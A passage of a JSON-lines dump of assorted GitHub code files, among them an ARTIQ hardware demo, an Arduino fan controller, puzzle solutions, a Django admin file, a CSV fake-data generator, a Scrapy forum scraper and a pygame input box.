(\"artiq.coredevice.ttl\", \"TTLOut\"):\n dev = self.get_device(name)\n if \"led\" in name: # guess\n self.leds[name] = dev\n elif \"ttl\" in name: # to exclude fmcdio_dirctl\n self.ttl_outs[name] = dev\n\n self.leds = sorted(self.leds.items(), key=lambda x: x[1].channel)\n self.ttl_outs = sorted(self.ttl_outs.items(), key=lambda x: x[1].channel)\n\n self.dirctl_word = (\n shiftreg_bits(0, 
dio_bank0_out_pins | dio_bank1_out_pins) |\n shiftreg_bits(1, dio_bank0_out_pins | dio_bank1_out_pins)\n )\n\n @kernel\n def init(self):\n self.core.break_realtime()\n print(\"*** Waiting for DRTIO ready...\")\n drtio_indices = [7]\n for i in drtio_indices:\n while not self.drtio_is_up(i):\n pass\n\n self.fmcdio_dirctl.set(self.dirctl_word)\n\n @kernel\n def drtio_is_up(self, drtio_index):\n if not self.core.get_rtio_destination_status(drtio_index):\n return False\n print(\"DRTIO #\", drtio_index, \"is ready\\n\")\n return True\n\n @kernel\n def test_led(self, led):\n while not is_enter_pressed():\n self.core.break_realtime()\n # do not fill the FIFOs too much to avoid long response times\n t = now_mu() - self.core.seconds_to_mu(0.2)\n while self.core.get_rtio_counter_mu() < t:\n pass\n for i in range(3):\n led.pulse(100*ms)\n delay(100*ms)\n\n def test_leds(self):\n print(\"*** Testing LEDs.\")\n print(\"Check for blinking. Press ENTER when done.\")\n\n for led_name, led_dev in self.leds:\n print(\"Testing LED: {}\".format(led_name))\n self.test_led(led_dev)\n\n @kernel\n def test_ttl_out_chunk(self, ttl_chunk):\n while not is_enter_pressed():\n self.core.break_realtime()\n for _ in range(50000):\n i = 0\n for ttl in ttl_chunk:\n i += 1\n for _ in range(i):\n ttl.pulse(1*us)\n delay(1*us)\n delay(10*us)\n\n def test_ttl_outs(self):\n print(\"*** Testing TTL outputs.\")\n print(\"Outputs are tested in groups of 4. Touch each TTL connector\")\n print(\"with the oscilloscope probe tip, and check that the number of\")\n print(\"pulses corresponds to its number in the group.\")\n print(\"Press ENTER when done.\")\n\n for ttl_chunk in chunker(self.ttl_outs, 4):\n print(\"Testing TTL outputs: {}.\".format(\", \".join(name for name, dev in ttl_chunk)))\n self.test_ttl_out_chunk([dev for name, dev in ttl_chunk])\n\n def run(self):\n self.core.reset()\n\n if self.leds:\n self.test_leds()\n if self.ttl_outs:\n self.test_ttl_outs()\n","repo_name":"hemmerlinglab/Electrons_Artiq_Sequences","sub_path":"artiq-master/examples/metlino_sayma_ttl/repository/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"70499625794","text":"from pyfirmata import Arduino, util\nfrom time import sleep\nimport math\n\ndef blink(board, pin, time):\n board.digital[pin].write(1)\n sleep(time)\n board.digital[pin].write(0)\n sleep(time)\n\n# configuracion de la tarjeta\nPORT = '/tmp/ttyS1'\nboard = Arduino(PORT)\nprint('Conexion lista')\n\nutil.Iterator(board).start()\n\n# configuro la salida del PWM para el ventilador\nMOTOR_PIN = 3\nmotor = board.get_pin(f'd:{str(MOTOR_PIN)}:p')\n\n# configuro salida del LED\nLED_PIN = 8\nled = board.get_pin(f'd:{str(LED_PIN)}:o')\n\n# configuracion SENSOR\nSENSOR_CURRENT_PIN = 0\ncurrent_sensor = board.get_pin(f'a:{str(SENSOR_CURRENT_PIN)}:i')\nsleep(1)\n\n\nwhile True:\n\n value = current_sensor.read()\n\n if value == None:\n continue\n\n celsius = value * 500\n celsius = math.ceil(celsius)\n\n if celsius <= 50:\n blink(board=board, pin=LED_PIN,time=1)\n motor.write(0.00)\n elif celsius > 50 and celsius <= 100:\n motor.write(0.33)\n led.write(1)\n elif celsius > 100 and celsius <= 150:\n motor.write(0.6)\n led.write(1)\n elif celsius > 150:\n motor.write(0.999)\n blink(board=board,pin=LED_PIN,time=0.2)\n\n print(f'temperatura 
{celsius}')\n\n","repo_name":"jalmx/micro-21","sub_path":"book/cap3/practices/temp_ventilador.py","file_name":"temp_ventilador.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12637277272","text":"class TaiFormula:\n def __init__(self):\n self._read_inputs()\n self._calculate_area()\n\n\n def _read_inputs(self):\n \"\"\"Obtain inputs\"\"\"\n self.data = list()\n for _ in range(int(input())):\n self.data.append(list(map(float, input().rstrip().split())))\n return self\n\n def _calculate_area(self):\n \"Loop over all trapezoids\"\n area = 0\n for idx in range(1, len(self.data)):\n glucose_change = (self.data[idx][1] + self.data[idx - 1][1])/2\n time_change = (self.data[idx][0] - self.data[idx - 1][0]) / 1000\n trapezoid_area = glucose_change * time_change\n area += trapezoid_area\n print(area)\n\n\nif __name__ == \"__main__\":\n TaiFormula()","repo_name":"sergeiissaev/Kattis-solutions","sub_path":"taisformula.py","file_name":"taisformula.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"39512254827","text":"# try and catch is used to handle exceptions\n\n# Excercises\n# index error\ntry:\n items = [1,2,3,4,5]\n item = items[2]\n print(item)\nexcept IndexError as e:\n print(e)\nelse:\n print(\"I only run if there is no exception\")\nfinally:\n print(\"I run no matter what\")\n \n \n#ZeroDivisionError\ndef divide_by(a,b):\n return a/b\n\ntry:\n ans = divide_by(50,0)\nexcept ZeroDivisionError as e: #specific exception\n print(e, \"we cannot divide by zero\")\nexcept Exception as e: #general exception\n print(e, \"Catches them all\")\n \n#FileNotFoundError\ntry:\n with open('file_does_not_exist.txt', 'r') as file:\n print(file.read())\nexcept:\n print(\"Unable to locate file\") \n \n# Checkout more about exceptions in the documentation of python https://realpython.com/python-exceptions/","repo_name":"gagan77/Python-Basics","sub_path":"Python-Basics/python_exceptions.py","file_name":"python_exceptions.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38479200736","text":"# Name: genSchemaCSV.py\n# Author: Rich Rose\n# Description: Create a fake csv based on a JSON schema\n# Lab: GSP291\n\nfrom random import randint\nfrom faker import Faker\nimport json\nimport sys\nimport argparse\n\nfake = Faker()\n\n# Name: getDatabaseSchema\n# Description: Open the schema\n\ndef getDatabaseSchema(filename, schema_dict):\n with open(filename, 'r') as file:\n schema_dict = json.load(file)\n \n return schema_dict\n\n\n# Name: getDataField\n# Description: Create fake data\n\ndef getDataField(index):\n switcher={\n # Generate a fake string length 5 to 20 characters\n 1: fake.pystr(min_chars=None, max_chars=randint(5,20)),\n # Generate a fake float length 5 with 2 decimal places\n 2: fake.pyfloat(left_digits=5, right_digits=2, positive=False),\n # Generate a custom type - add your own definition :-)\n 3: 'Custom TYPE'\n }\n \n return switcher.get(index, \"Invalid index - update buildHeaderField\")\n\n\n# Name: setDataRow\n# Description: Add some fake data based on the schema type\n\ndef setDataRow(schema_dict, csvRow):\n\n index = 0\n bound = len(schema_dict)-1\n customField = \"\"\n\n for schema in schema_dict:\n if index < bound:\n if schema['type'] == \"STRING\":\n customField = getDataField(1)\n elif 
schema['type'] == \"FLOAT\":\n customField = getDataField(2)\n\n csvRow = csvRow + str(customField) + \",\"\n index = index + 1\n else:\n if schema['type'] == \"STRING\":\n customField = getDataField(1)\n elif schema['type'] == \"FLOAT\":\n customField = getDataField(2)\n csvRow = csvRow + str(customField) + \"\\n\"\n\n return csvRow\n\n\n# Name: setHeaderRow\n# Description: Use the schema to create a header row\n\ndef setHeaderRow(schema_dict, csvHeader):\n\n index = 0\n bound = len(schema_dict)-1\n\n for schema in schema_dict:\n if index < bound:\n csvHeader = csvHeader + schema['name'] + \",\"\n index = index + 1\n else:\n csvHeader = csvHeader + schema['name'] + \"\\n\"\n\n return csvHeader\n\n\n# Name: getCustomCSV\n# Description: Take the schema and output psuedo csv data\n\ndef getCustomCSV(schema_dict, numRows):\n csvHeader = \"\"\n csvRow = \"\"\n index = 0\n \n # Open file\n with open('test.csv', 'w') as csv_file:\n # Generate header for the file\n csvHeader = setHeaderRow(schema_dict, csvHeader)\n # print (csvHeader)\n csv_file.write(csvHeader)\n\n for index in range(int(numRows)):\n # Generate N rows for the file\n csvRow = setDataRow(schema_dict, csvRow)\n # print (csvRow)\n csv_file.write(csvRow)\n\n\n# Name: getArguments\n# Description: Process command line arguments\n\ndef getArguments():\n\n filename = \"\"\n numRows = 0\n\n # Consume schema\n parser=argparse.ArgumentParser(description='Schema command line executer')\n parser.add_argument('--schema', help='Add value1')\n parser.add_argument('--numRows',help='Add value2')\n\n args=parser.parse_args()\n\n # Ensure two arguments are supplied\n if (len(sys.argv) < 2):\n parser.print_help()\n else:\n # Map filename + numRow\n filename = args.schema\n numRows = args.numRows\n\n # Return value\n return filename, int(numRows)\n\n\n# Process the Dataschema and build a CSV\n# Usage: app --schema file.json --numRows 10\n\nif __name__ == '__main__':\n schema_dict = []\n filename = \"\"\n numRows = 0\n\n # Validate arguments\n filename, numRows=getArguments()\n\n # Only process information if data is required\n if numRows > 0:\n # Read in the JSON schema\n schema_dict = getDatabaseSchema(filename, schema_dict)\n\n # Build a CSV based on the schema\n getCustomCSV(schema_dict, numRows)\n","repo_name":"rosera/gcp-dataflow-tools","sub_path":"genSchemaCSV.py","file_name":"genSchemaCSV.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9075892059","text":"from django.contrib import admin\nfrom .models import District, Property, PropertyImages,Wishlist,Comment\n\n# Register your models here.\n\nclass PropertyImagesInline(admin.StackedInline):\n model = PropertyImages\n\nclass PropertyAdmin(admin.ModelAdmin):\n model = Property\n inlines = [PropertyImagesInline,]\n\n list_display = ('title', 'plot_area', 'rate', 'zip_code', 'owner', 'is_occupied')\n\n fieldsets = (\n (None, { 'fields': ('title', 'description', 'owner', 'is_occupied', ) }),\n ('Address', { 'fields': ('address_1', 'city', 'district', 'zip_code','location',) }),\n ('Other Info', { 'fields': ('no_of_floors', 'plot_area', 'rate', 'has_watersupply', 'has_electricity',\n 'no_of_bathrooms_inside','no_of_bathrooms_outside','no_of_bedrooms','master_bedroon','no_of_livingrooms','kitchen','dining_hall','feature_1','feature_2',) }),\n #('Property Images',{ 'fields': ('Image',)}),\n )\n\n search_fields = ('title', 'zip_code', 'city','district', 
'description')\n\nadmin.site.register(Property, PropertyAdmin)\nadmin.site.register(PropertyImages)\nadmin.site.register(District)\nadmin.site.register(Comment)\nadmin.site.register(Wishlist)\n\n","repo_name":"akhilaanand26/Project-Code","sub_path":"findahome/properties/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10620304574","text":"class Solution:\n def addStrings(self, num1: str, num2: str) -> str:\n s1, s2 = len(num1) - 1, len(num2) - 1\n ans, cb = \"\", 0\n while s1 >= 0 or s2 >= 0:\n n1 = int(num1[s1]) if s1 >= 0 else 0\n n2 = int(num2[s2]) if s2 >= 0 else 0\n d = n1 + n2 + cb\n cb = d // 10\n d %= 10\n ans += str(d)\n s1, s2 = s1 - 1, s2 - 1\n if cb != 0:\n ans += str(cb)\n return ans[::-1]","repo_name":"Dawinia/LeetCode","sub_path":"String/415. 字符串相加.py","file_name":"415. 字符串相加.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"10201966536","text":"HASHING_WRONG_SIZE = 1\nHASHING_WRONG_HASH = 2\nCHECK_NO_OPTIONS = 3\nMHLFILE_INCORRECT_INPUT = 4\nMHLHASH_CORRECT_OPTIONS = 5\nMHLFILE_FILE_INPUT = 6\nMHLFILE_CORRECT_OPTIONS = 7\nINCORRECT_OPTIONS = 8\nFILE_PATHS = 9\nABSOLUTE_FILE_PATHS = 10\nLONG_NAMES = 11\nNON_ASCII_TEST = 12\nMHL_CHARSETS_TEST = 13\nSEQUENCES_TEST = 14\nBIG_FILES_TEST = 15\nMANY_FILES_TEST = 16\nMHLFILE_MULTIPLE_OUTDIR = 17\nMHLFILE_BASIC = 18\nRECURSIVE_DIR_PROCESS = 19\n\nscen_defs = {\n\"Deleted last bytes\": HASHING_WRONG_SIZE,\n\"Change last bytes\": HASHING_WRONG_HASH,\n\"No options in a given command\": CHECK_NO_OPTIONS,\n\"mhlfile: correct options and incorrect input\": MHLFILE_INCORRECT_INPUT,\n\"mhlhash: correct options in different order\": MHLHASH_CORRECT_OPTIONS,\n\"mhlfile: input from file\": MHLFILE_FILE_INPUT,\n\"mhlfile: correct options in different order\": MHLFILE_CORRECT_OPTIONS,\n\"mhlfile: multiple '--output-folder' specification\": MHLFILE_MULTIPLE_OUTDIR,\n\"mhlhash: recursive directory calculate\": RECURSIVE_DIR_PROCESS,\n\"mhlseal and mhlverify: recursive directory and multiple '-o' testing\": MHLFILE_MULTIPLE_OUTDIR,\n\"Incorrect options\": INCORRECT_OPTIONS,\n\"Test for mhl file\": MHLFILE_BASIC,\n\"Test for mhl seal\": MHLFILE_BASIC,\n\"mhl hash and file: Files and folders paths and asterisk\": FILE_PATHS,\n\"mhl seal and verify: Files and folders paths and asterisk\": FILE_PATHS,\n\"mhl hash and file: Absolute filepaths\": ABSOLUTE_FILE_PATHS,\n\"mhl seal and verify: Absolute filepaths\": ABSOLUTE_FILE_PATHS,\n\"Long file name, directory name, MHL file name\": LONG_NAMES,\n\"Only non-ASCII characters in filepaths, system default NFC & NFD\": NON_ASCII_TEST,\n\"relative test non-ASCII characters in filepaths, system default NFC & NFD\": RECURSIVE_DIR_PROCESS,\n\"Mixed ASCII and non-ASCII characters in filepaths NFC\": NON_ASCII_TEST,\n\"Mixed ASCII and non-ASCII characters in filepaths NFD\": NON_ASCII_TEST,\n\"Non-ASCII European characters in filepaths NFC\": NON_ASCII_TEST,\n\"Non-ASCII European characters in filepaths NFD\": NON_ASCII_TEST,\n\"mhlhash: different encodings in MHL file\": MHL_CHARSETS_TEST,\n\"mhlsign: different encodings in MHL file\": MHL_CHARSETS_TEST,\n\"Sequences parsing failure\": SEQUENCES_TEST,\n\"Gaps in sequences failure\": SEQUENCES_TEST,\n\"Success work with sequences\": SEQUENCES_TEST,\n\"Absolute test for file sizes 2Gb +2b, 4Gb +2b, 8Gb +2b\": 
BIG_FILES_TEST,\n\"Relative test for big files\": BIG_FILES_TEST,\n\"mhlhash: work with large number of files\": MANY_FILES_TEST,\n\"Work with large number of files\": MANY_FILES_TEST\n}\n\ndef get_test_case_id(name):\n scen_id = scen_defs[name]\n return scen_id\n# return 0\n","repo_name":"pomfort/mhl-tool","sub_path":"tests/features/test_consistency.py","file_name":"test_consistency.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"61"} +{"seq_id":"23571000221","text":"\n\ndef calcLs(stallList, currDex):\n for num in range(1, len(stallList)):\n if stallList[num] == currDex:\n return stallList[num] - stallList[num - 1] - 1\n\ndef calcRs(stallList, currDex):\n for num in range(len(stallList) - 1, 0, -1):\n if stallList[num] == currDex:\n return stallList[num + 1] - stallList[num] - 1\n\ndef findGap(stallList):\n maxGap = - 1\n start, end = 0, 0\n for i in range(len(stallList) - 1):\n if stallList[i + 1] - stallList[i] > maxGap:\n start = stallList[i]\n end = stallList[i + 1]\n maxGap = end - start\n return start, end\n\ndef play(listSize, numPeople):\n # if numPeople == 1: return listSize // 2, listSize // 2 - 1\n # elif numPeople > (listSize // 2 + 1): return 0, 0\n\n stallList = [0, listSize + 1]\n start, end = 0, listSize + 1\n for num in range(numPeople - 1):\n stallList.append((end - start) // 2 + start)\n stallList = sorted(stallList)\n start, end = findGap(stallList)\n\n lastPersonDex = (end - start) // 2 + start\n stallList.append(lastPersonDex)\n stallList = sorted(stallList)\n\n Ls = calcLs(stallList, lastPersonDex)\n Rs = calcRs(stallList, lastPersonDex)\n\n return max(Ls, Rs), min(Ls, Rs)\n\n\n\nif __name__ == '__main__':\n inputName = \"smallBathroomOne.txt\"\n outputName = \"outputSmallBathroomOne(2).txt\"\n f = open(\"/Users/benhubsch/Dropbox/Side Projects/Google Code Jam/\" + inputName,'r')\n w = open(\"/Users/benhubsch/Dropbox/Side Projects/Google Code Jam/\" + outputName,'w')\n case = 0\n for line in f:\n if case != 0:\n arg1, arg2 = int(line.strip().split()[0]), int(line.strip().split()[1])\n maxOut, minOut = play(arg1, arg2)\n w.write(\"Case #\" + str(case) + \": \" + str(maxOut) + \" \"+ str(minOut) + \"\\n\")\n case += 1\n f.close()\n w.close()\n # print(play(3,1))\n\n\n\n# def initialize(stalls):\n# initial = [\"\"]*(stalls+2)\n# initial[0] = \"o\"\n# initial[len(initial) - 1] = \"o\"\n# return initial\n\n# def chooseStall(stallList, start, end):\n# chosenStall = (end - start) // 2 + start\n# stallList[chosenStall] = \"o\"\n# return stallList\n\n# def findGap(stallList):\n# dexO = []\n# for i in range(0, len(stallList)):\n# if stallList[i] == \"o\":\n# dexO.append(i)\n# maxGap = - 1\n# start, end = 0, 0\n# for num in range(0, len(dexO) - 1):\n# if dexO[num + 1] - dexO[num] > maxGap:\n# start = dexO[num]\n# end = dexO[num + 1]\n# maxGap = dexO[num + 1] - dexO[num]\n# return start, end\n\n# def play(listSize, numPeople):\n# stallList = initialize(listSize)\n# start, end = 0, len(stallList) - 1\n# for num in range(numPeople - 1):\n# stallList = chooseStall(stallList, start, end)\n# start, end = findGap(stallList)\n#\n# lastPersonDex = (end - start) // 2 + start\n# Ls = calcLs(stallList, lastPersonDex)\n# Rs = calcRs(stallList, lastPersonDex)\n# return max(Ls, Rs), min(Ls, Rs)\n\n\n\n\n\n# def initialize(stalls):\n# initial = [\"\"]*(stalls+2)\n# initial[0] = \"o\"\n# initial[len(initial) - 1] = \"o\"\n# return initial\n#\n# def calcLs(stallList, currDex):\n# for num in 
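# A compact alternative to the simulation in the Code Jam solution below —
# a hedged sketch, not the original author's method: each occupant takes
# the midpoint of the largest empty run of g stalls, leaving runs of
# g // 2 and (g - 1) // 2. A max-heap of run lengths reproduces
# play(listSize, numPeople)'s (max(Ls, Rs), min(Ls, Rs)) for the last
# person; `stalls` is a hypothetical name used only for illustration.
import heapq

def stalls(n, k):
    heap = [-n]  # negate sizes so heapq behaves as a max-heap
    hi = lo = 0
    for _ in range(k):
        g = -heapq.heappop(heap)
        hi, lo = g // 2, (g - 1) // 2  # runs left after taking the midpoint
        heapq.heappush(heap, -hi)
        heapq.heappush(heap, -lo)
    return hi, lo

# e.g. stalls(4, 2) -> (1, 0), matching the simulation on small inputs.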
range(currDex, 0, -1):\n# if stallList[num] == \"o\":\n# return currDex - num - 1\n# return currDex - 1\n#\n# def calcRs(stallList, currDex):\n# for num in range(currDex, len(stallList)):\n# if stallList[num] == \"o\":\n# return num - currDex - 1\n# return len(stallList) - currDex - 2\n#\n# def playScenario(stallList, people):\n# for person in range(people):\n# personConsiderations = []\n# stallDex = []\n# for i in range(1, len(stallList) - 1):\n# if stallList[i] != \"o\":\n# Ls = calcLs(stallList, i)\n# Rs = calcRs(stallList, i)\n# personConsiderations.append([Ls, Rs])\n# stallDex.append(i)\n# minLsRs = -1\n# for consideration in personConsiderations:\n# if min(consideration) > minLsRs:\n# minLsRs = min(consideration)\n# maxes = []\n# maxDexes = []\n# for s in range(len(stallDex)):\n# if min(personConsiderations[s]) == minLsRs:\n# maxes.append(personConsiderations[s])\n# maxDexes.append(s)\n#\n# if len(maxes) == 1:\n# stallList[maxDexes[0]] == \"o\"\n# else:\n# maxLsRs = -1\n# for q in range(len(maxes)):\n# if (max(maxes[q]) > maxLsRs):\n# maxLsRs = maxes[q]\n# chosenStall = maxDexes[q]\n# stallList[chosenStall] = \"o\"\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/2661.py","file_name":"2661.py","file_ext":"py","file_size_in_byte":4708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27759340985","text":"import numpy as np\nimport csv\nfrom ClaseFlores import flores\nclass ManejadorFlores:\n __cantidad: 0\n __dimension: 0\n\n def __init__(self, dimension):\n self.__ListaFlores = np.empty(dimension, dtype=flores)\n self.__dimension = dimension\n self.__cantidad = 0\n #self.__ListaFlores=[]\n\n def __str__(self):\n s = \"\"\n for flores in self.__ListaFlores:\n s += str(flores) + '\\n'\n return s\n\n def crearFlor(self,unaFlor):\n if self.__cantidad == self.__dimension:\n self.__ListaFlores.resize(self.__dimension)\n self.__ListaFlores[self.__cantidad] = unaFlor\n self.__cantidad += 1\n\n def leerFlores(self):\n with open(\"flores.csv\",\"r\") as file:\n reader=csv.reader(file,delimiter=\";\")\n for fila in reader:\n numero = fila[0]\n nombre = fila[1]\n color = fila[2]\n descripcion = fila[3]\n unaFlor = flores(numero,nombre,color,descripcion)\n self.crearFlor(unaFlor)\n #reader = np.loadtxt(file, delimiter=\";\")\n\n \n","repo_name":"katherina-00/Unidad-3","sub_path":"ejercicio2/ClaseManejadorFlores.py","file_name":"ClaseManejadorFlores.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43107337671","text":"import math\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport scipy.stats\nfrom sklearn import datasets, linear_model\nfrom sklearn.metrics import mean_squared_error, r2_score\n\npath = \"./assets/Age_And_Time.csv\"\nageAndTimeDf = pd.read_csv(path)\npath = \"./assets/countries.csv\"\ncountriesDf = pd.read_csv(path)\n# a\nx = scipy.stats.norm.rvs(size=30, loc=5, scale=1)\nprint(x)\n# b\ny = 5 * x + 2\nprint(y)\n#c\ndef calcR(x,y):\n r=np.cov(x,y, ddof=0)[0][1]/(np.std(x, ddof=0)*np.std(y, ddof=0))\n\n return r\nr= calcR(x,y)\nprint(r)\n#d\ndef calcB(x,y,r):\n b=r*(np.std(y, ddof=0)/np.std(x, ddof=0))\n\n return b\nprint(calcB(x,y,r))\n\n#e\nnoise= scipy.stats.norm.rvs(loc=0, scale=1, size=30)\nnewY=y+noise\nr=calcR(x,newY)\nprint(r)\nprint(calcB(x,newY,r))\n\n#f\nnoises=np.linspace(0.5,10,100)\nrVector=[]\nbVector = []\nfor noise in noises:\n noise 
= scipy.stats.norm.rvs(loc=0, scale=noise, size=30)\n newY= y + noise\n r = calcR(x, newY)\n b=calcB(x, newY, r)\n rVector.append(r)\n bVector.append(b)\nprint (rVector)\nprint (bVector)\nplt.scatter(noises,rVector)\nplt.show()\nplt.scatter(noises,bVector)\nplt.show()\n","repo_name":"nivp9/statistics-4","sub_path":"Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4234626423","text":"import time\nimport requests\nimport os\nimport json\nimport re\nimport scrapy\nfrom math import ceil\nimport configparser\nfrom urllib.parse import urlencode\nfrom lxml.html import fromstring\nfrom scrapy.http import Request, FormRequest\nfrom scrapy.crawler import CrawlerProcess\nfrom datetime import datetime, timedelta\nfrom scraper.base_scrapper import (\n SitemapSpider,\n SiteMapScrapper\n)\n\n\nclass SoqorSpider(SitemapSpider):\n name = 'soqor_spider'\n base_url = 'https://forums.soqor.net/'\n\n # Xpaths\n forum_xpath = '//a[@class=\"forum-title\"]/@href|'\\\n '//a[@class=\"subforum-title\"]/@href'\n thread_xpath = '//tr[contains(@class, \"topic-item \")]'\n thread_first_page_xpath = './/a[contains(@class,\"topic-title \")]/@href'\n thread_last_page_xpath = './/a[contains(@class,\"pagenav-last-button\")]/@href'\n thread_date_xpath = './/span[@class=\"post-date\"]/text()'\n pagination_xpath = '//a[contains(@class, \"pagenav-next-button\") '\\\n 'and not(contains(@class,\"h-hide\"))]/@href'\n thread_pagination_xpath = '//a[contains(@class,\"pagenav-current-button\")]'\\\n '/preceding-sibling::a[1]/@href'\n thread_page_xpath = '//a[contains(@class,\"pagenav-current-button\")]/text()'\n post_date_xpath = '//time[@itemprop=\"dateCreated\"]/@datetime'\n\n avatar_xpath = '//a[contains(@class,\"avatar--thread\")]/img/@src'\n\n # Regex stuffs\n avatar_name_pattern = re.compile(\n r\".*/(\\S+\\.\\w+)\",\n re.IGNORECASE\n )\n topic_pattern = re.compile(\n r'.*/(\\d+)-',\n re.IGNORECASE\n )\n\n # Other settings\n use_proxy = \"On\"\n sitemap_datetime_format = '%m-%d-%Y, %I:%M %p'\n post_datetime_format = '%Y-%m-%dT%H:%M:%S'\n\n def parse_thread_date(self, thread_date):\n thread_date = thread_date.strip().strip(',')\n days = None\n if 'ساعات' in thread_date.lower():\n # hours\n days = 0\n elif 'أسبوع' in thread_date.lower():\n # week\n days = 7\n elif 'يوم' in thread_date.lower():\n # days\n match = re.findall(r'\\d+', thread_date.lower())\n days = int(match[0])\n elif 'أسابيع' in thread_date.lower():\n # weeks\n match = re.findall(r'\\d+', thread_date.lower())\n days = int(match[0]) * 7\n if days is not None:\n return datetime.today() - timedelta(days=days)\n return datetime.strptime(\n thread_date,\n self.sitemap_datetime_format\n )\n\n def parse_post_date(self, post_date):\n post_date = post_date.strip().strip(',')\n days = None\n if 'ساعات' in post_date.lower():\n # hours\n days = 0\n elif 'أسبوع' in post_date.lower():\n # week\n days = 7\n elif 'يوم' in post_date.lower():\n # days\n match = re.findall(r'\\d+', post_date.lower())\n days = int(match[0])\n elif 'أسابيع' in post_date.lower():\n # weeks\n match = re.findall(r'\\d+', post_date.lower())\n days = int(match[0]) * 7\n if days is not None:\n return datetime.today() - timedelta(days=days)\n return datetime.strptime(\n post_date,\n self.post_datetime_format\n )\n\n def parse(self, response):\n # Synchronize user agent for cloudfare middleware\n self.synchronize_headers(response)\n\n # Load all forums\n all_forums = 
response.xpath(self.forum_xpath).extract()\n\n # update stats\n self.crawler.stats.set_value(\"mainlist/mainlist_count\", len(all_forums))\n\n for forum_url in all_forums:\n\n # Standardize url\n if self.base_url not in forum_url:\n forum_url = self.base_url + forum_url\n yield Request(\n url=forum_url,\n headers=self.headers,\n meta=self.synchronize_meta(response),\n callback=self.parse_forum\n )\n\n def parse_thread(self, response):\n\n # Synchronize cloudfare user agent\n self.synchronize_headers(response)\n\n # Check current page and last page\n current_page = response.xpath(self.thread_page_xpath).extract_first() or 1\n last_page = response.xpath(self.thread_last_page_xpath).extract_first()\n\n # Reverse scraping start here\n if int(current_page) == 1 and last_page:\n if self.base_url not in last_page:\n last_page = self.base_url + last_page\n yield Request(\n url=last_page,\n headers=self.headers,\n callback=super().parse_thread,\n meta=self.synchronize_meta(\n response,\n default_meta={\n \"topic_id\": response.meta.get(\"topic_id\")\n }\n )\n )\n\n # Save generic thread\n yield from super().parse_thread(response)\n\n # Save avatars\n yield from self.parse_avatars(response)\n\n def parse_avatars(self, response):\n\n # Synchronize headers user agent with cloudfare middleware\n self.synchronize_headers(response)\n\n # Save avatar content\n all_avatars = response.xpath(self.avatar_xpath).extract()\n for avatar_url in all_avatars:\n\n avatar_url = avatar_url.strip('.').split('..')[-1]\n\n # Standardize avatar url\n if not avatar_url.lower().startswith(\"http\"):\n avatar_url = self.base_url + avatar_url\n\n if 'image/svg' in avatar_url:\n continue\n\n file_name = self.get_avatar_file(avatar_url)\n\n if file_name is None:\n continue\n\n if os.path.exists(file_name):\n continue\n\n yield Request(\n url=avatar_url,\n headers=self.headers,\n callback=self.parse_avatar,\n meta=self.synchronize_meta(\n response,\n default_meta={\n \"file_name\": file_name\n }\n ),\n )\n\n\nclass SoqorScrapper(SiteMapScrapper):\n\n spider_class = SoqorSpider\n site_name = 'forums.soqor.net'\n site_type = 'forum'\n","repo_name":"ken2190/Enterprise-Forum-Scraper","sub_path":"scraper/soqor.py","file_name":"soqor.py","file_ext":"py","file_size_in_byte":6343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4519220423","text":"import pygame as pg \r\nimport random\r\nimport sys\r\nfrom os import path\r\nfrom settings import *\r\nfrom player import *\r\n\r\n#TODO\r\n#Scoring + more\r\n\r\n#Input box class\r\nclass InputBox:\r\n def __init__(self, x, y, w, h, text=''):\r\n self.rect = pg.Rect(x, y, w, h)\r\n self.colour = RED\r\n self.text = text\r\n self.text_surface = FONT.render(text, True, self.colour)\r\n self.active = False\r\n\r\n def handle_event(self, event):\r\n if event.type == pg.MOUSEBUTTONDOWN:\r\n # If the user clicked on the input_box rect.\r\n if self.rect.collidepoint(event.pos):\r\n # Toggle the active variable.\r\n self.active = not self.active\r\n else:\r\n self.active = False\r\n # Change the current color of the input box.\r\n self.colour = BLUE if self.active else RED\r\n if event.type == pg.KEYDOWN:\r\n if self.active:\r\n if event.key == pg.K_RETURN:\r\n print(self.text)\r\n self.text = ''\r\n elif event.key == pg.K_BACKSPACE:\r\n self.text = self.text[:-1]\r\n else:\r\n self.text += event.unicode\r\n # Re-render the text.\r\n self.text_surface = FONT.render(self.text, True, self.colour)\r\n\r\n def update(self):\r\n # Resize the 
